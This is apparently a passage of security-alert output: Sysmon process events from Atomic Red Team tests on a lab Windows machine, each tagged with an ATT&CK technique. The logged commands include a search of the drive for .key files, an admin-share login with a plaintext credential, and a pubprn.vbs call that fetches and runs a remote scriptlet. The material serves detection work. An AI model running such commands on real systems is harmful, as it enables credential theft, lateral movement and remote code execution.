<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:49:31.675</Data>
<Data Name=""ProcessGuid"">747F3D96-D87B-5D31-0000-0010D92D3100</Data>
<Data Name=""ProcessId"">3188</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547737.570057,2019-07-19T18:48:57.570057+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /S /D /c&quot; dir c:\ /b /s .key &quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:48:57.557947Z"">
</TimeCreated>
<EventRecordID>3678</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:48:57.532</Data>
<Data Name=""ProcessGuid"">747F3D96-D859-5D31-0000-001045922F00</Data>
<Data Name=""ProcessId"">6220</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">C:\Windows\system32\cmd.exe /S /D /c&quot; dir c:\ /b /s .key &quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D859-5D31-0000-0010FB8F2F00</Data>
<Data Name=""ParentProcessId"">888</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;dir c:\ /b /s .key | findstr /e .key&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547737.557947,2019-07-19T18:48:57.557947+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;dir c:\ /b /s .key | findstr /e .key&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:48:57.524876Z"">
</TimeCreated>
<EventRecordID>3677</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:48:57.502</Data>
<Data Name=""ProcessGuid"">747F3D96-D859-5D31-0000-0010FB8F2F00</Data>
<Data Name=""ProcessId"">888</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;dir c:\ /b /s .key | findstr /e .key&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547737.524876,2019-07-19T18:48:57.524876+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;echo &quot; &quot;ATOMICREDTEAM &gt; %%windir%%\cert.key&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:48:57.466584Z"">
</TimeCreated>
<EventRecordID>3676</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:48:57.433</Data>
<Data Name=""ProcessGuid"">747F3D96-D859-5D31-0000-0010E68C2F00</Data>
<Data Name=""ProcessId"">6524</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;echo &quot; &quot;ATOMICREDTEAM &gt; %%windir%%\cert.key&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547737.466584,2019-07-19T18:48:57.466584+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:48:46.238056Z"">
</TimeCreated>
<EventRecordID>3675</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:48:46.221</Data>
<Data Name=""ProcessGuid"">747F3D96-D84E-5D31-0000-00102C702F00</Data>
<Data Name=""ProcessId"">1628</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1077] Windows Admin Shares - Process - Created,1563547726.238056,2019-07-19T18:48:46.238056+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\net.exe ) through command line ( net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:48:41.109076Z"">
</TimeCreated>
<EventRecordID>3674</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:48:41.103</Data>
<Data Name=""ProcessGuid"">747F3D96-D849-5D31-0000-00103C522F00</Data>
<Data Name=""ProcessId"">6068</Data>
<Data Name=""Image"">C:\Windows\System32\net.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Net Command</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=4F4970C3545972FEA2BC1984D597FC810E6321E0,MD5=AE61D8F04BCDE8158304067913160B31,SHA256=25C8266D2BC1D5626DCDF72419838B397D28D44D00AC09F02FF4E421B43EC369,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D849-5D31-0000-0010E54F2F00</Data>
<Data Name=""ParentProcessId"">3284</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd.exe /c net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1077] Windows Admin Shares - Network,1563547726.238056,2019-07-19T18:48:46.238056+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\net.exe ) through command line ( net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:48:41.109076Z"">
</TimeCreated>
<EventRecordID>3674</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:48:41.103</Data>
<Data Name=""ProcessGuid"">747F3D96-D849-5D31-0000-00103C522F00</Data>
<Data Name=""ProcessId"">6068</Data>
<Data Name=""Image"">C:\Windows\System32\net.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Net Command</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=4F4970C3545972FEA2BC1984D597FC810E6321E0,MD5=AE61D8F04BCDE8158304067913160B31,SHA256=25C8266D2BC1D5626DCDF72419838B397D28D44D00AC09F02FF4E421B43EC369,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D849-5D31-0000-0010E54F2F00</Data>
<Data Name=""ParentProcessId"">3284</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd.exe /c net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547721.109076,2019-07-19T18:48:41.109076+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:48:41.085108Z"">
</TimeCreated>
<EventRecordID>3673</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:48:41.068</Data>
<Data Name=""ProcessGuid"">747F3D96-D849-5D31-0000-0010E54F2F00</Data>
<Data Name=""ProcessId"">3284</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd.exe /c net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D849-5D31-0000-0010914D2F00</Data>
<Data Name=""ParentProcessId"">2096</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;cmd.exe /c &quot; net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547721.085108,2019-07-19T18:48:41.085108+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;cmd.exe /c &quot; net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:48:41.050661Z"">
</TimeCreated>
<EventRecordID>3672</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:48:41.034</Data>
<Data Name=""ProcessGuid"">747F3D96-D849-5D31-0000-0010914D2F00</Data>
<Data Name=""ProcessId"">2096</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;cmd.exe /c &quot; net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547717.347265,2019-07-19T18:48:37.347265+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:48:37.264352Z"">
</TimeCreated>
<EventRecordID>3670</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:48:37.099</Data>
<Data Name=""ProcessGuid"">747F3D96-D845-5D31-0000-001098212F00</Data>
<Data Name=""ProcessId"">2624</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T1059 ] wscript or cscript runing script,1563547717.264352,2019-07-19T18:48:37.264352+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run wscript or cscript with Command Line (cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost &quot; script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct) in directory : ( C:\AtomicRedTeam\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:48:36.882586Z"">
</TimeCreated>
<EventRecordID>3669</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:48:36.869</Data>
<Data Name=""ProcessGuid"">747F3D96-D844-5D31-0000-0010C70A2F00</Data>
<Data Name=""ProcessId"">2484</Data>
<Data Name=""Image"">C:\Windows\System32\cscript.exe</Data>
<Data Name=""FileVersion"">5.812.10240.16384</Data>
<Data Name=""Description"">Microsoft ® Console Based Script Host</Data>
<Data Name=""Product"">Microsoft ® Windows Script Host</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=0E3C0779D8EAAD3B00363D7890DDC8272B510D49,MD5=A45586B3A5A291516CD10EF4FD3EE768,SHA256=59D3CDC7D51FA34C6B27B8B04EA17992955466EB25022B7BD64880AB35DF0BBC,IMPHASH=2B44D2206B9865383429E9C1524F1CAC</Data>
